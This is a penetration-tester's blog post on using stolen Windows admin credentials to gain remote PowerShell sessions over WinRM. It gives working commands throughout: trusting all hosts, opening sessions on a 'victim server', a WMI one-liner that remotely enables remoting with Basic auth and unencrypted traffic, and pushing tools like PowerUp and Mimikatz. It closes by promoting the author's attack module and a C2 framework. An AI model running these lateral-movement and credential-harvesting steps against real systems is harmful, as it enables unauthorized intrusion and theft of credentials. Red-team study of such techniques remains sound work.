You have obtained some level of admin creds, (local, domain or otherwise) to a windows server/domain, there is no RDP. There is however the WinRM service, PSRemoting to give it its other name, this allows an admin to create a remote PowerShell session to the server and run commands or scripts, very much like the ssh service used on Linux systems.
The admin level creds you have will allow you to connect to the remote server(s) via PSRemoting, and you will want to run hacker PowerShell tools in the remote session to further infiltrate the server or systems, however, given the lack of RDP and the locked down state of the network and services, you may struggle to get the likes of PowerSploit onto the remote system.
So for instance we might want to run Invoke-Mimikatz on the remote server to extract clear text credentials stored on the server. Lets explore PSRemoting in a liitle more depth.
Make sure you have enabled PSSRemoting on your attacker system before you continue, below is how to set it up;
Open a PowerShell session as admininstrator
run the following commands
This will enable the winrm service and set up the firewall etc, this is strictly not necessary, but it shows the process.
Next we have to set our system to ‘Trust’ remote hosts for remoting to
Set-Item WSMan:localhost\client\trustedhosts -value *
This command will allow the local system to connect to ANY remote PSSession, the * can be replaced by ip addresses or ranges or hostnames to be a touch more secure if required.
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 'machineA,machineB'
As PSSRemoting is enabled by default on Server 2012 upwards and we have gained some admin creds we can use the Enter-PSSession command, or if no session is available we can create a New-PSSession on the target server. The commands below will achieve this
Enter-PSSession -ComputerName 192.168.0.2 -Credential hackme\admin
Replacing hackme\admin with the domain name and username of the obtained credentials and the ComputerName to the IP address of the victim server.
Or, if a session does not exist we can add a new one
New-PSSession -ComputerName 192.168.0.2 -Credential hackme\admin
And then re-run the Enter-PSSession command
OK, so we have remote session onto a victim server in the Hackme domain, PSSRemoting is set up for trusted hosts from the local attacker system to connect with the correct credentials.
Enable PS Remoting Remotely
So what if PSRemoting is not enabled on the server or you want to access a Windows 7 workstation, (Windows 8 and 10 can also be remoted into).
This is where the awesome abilities of WMI comes into play, as we have admin level creds we can remotley enable PS Remoting, with the following command
$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force' Invoke-WmiMethod -Path Win32_process -Name create -ComputerName remote-computer -Credential domain\user -ArgumentList $command
Above we’ve enabled PSRemoting on a Windows 7 x64 workstation, and below we’ve created a New-PSSession and Entered the session
Awesome, next we have to get some hacking tools onto the remote box via the remoting session, there’s a PowerShell cmdlet for this too.
Invoke-Command -Session 'session' -Filename 'path to the powershell script'
Where the session arguement is made up as below
$remotesession = New-PSSession -ComputerName $remote -Credential $creden -Name $remote
This allows us to ‘Push’ a script via PSRemoting to the remote system
The screen captures below shows the process, first we create a variable to carry the ‘session’ information, which in turn allows us to ‘Push’ the PowerUp.ps1 module to the remote system.
Next we reconnect to the remote system and run our choice of PowerUp command ‘Invoke-AllChecks’
While this is all cool and fairly staight forward, to ease the leverage of this I’ve written a small PowerShell module to make the process a lot easier.
The cmdlet is available from my Github – https://github.com/davehardy20/Invoke-WinRMAttack
Simply clone the git repository and import the module into your PowerShell session and fill in the gaps, full help and examples are provided with the module, by issuing
Get-help Invoke-WinRMAttack -Full
A quick example below
If you find any issues or have any feature requests you can get in touch via github and I’ll try to fix any issues and implement requests for features.
I’m also going to add this functionallity into PoshC2 to further its capabilities. PoshC2 can be found here – https://github.com/nettitude/PoshC2https://github.com/nettitude/PoshC2
2 thoughts on “PowerShell PSRemoting Pwnage”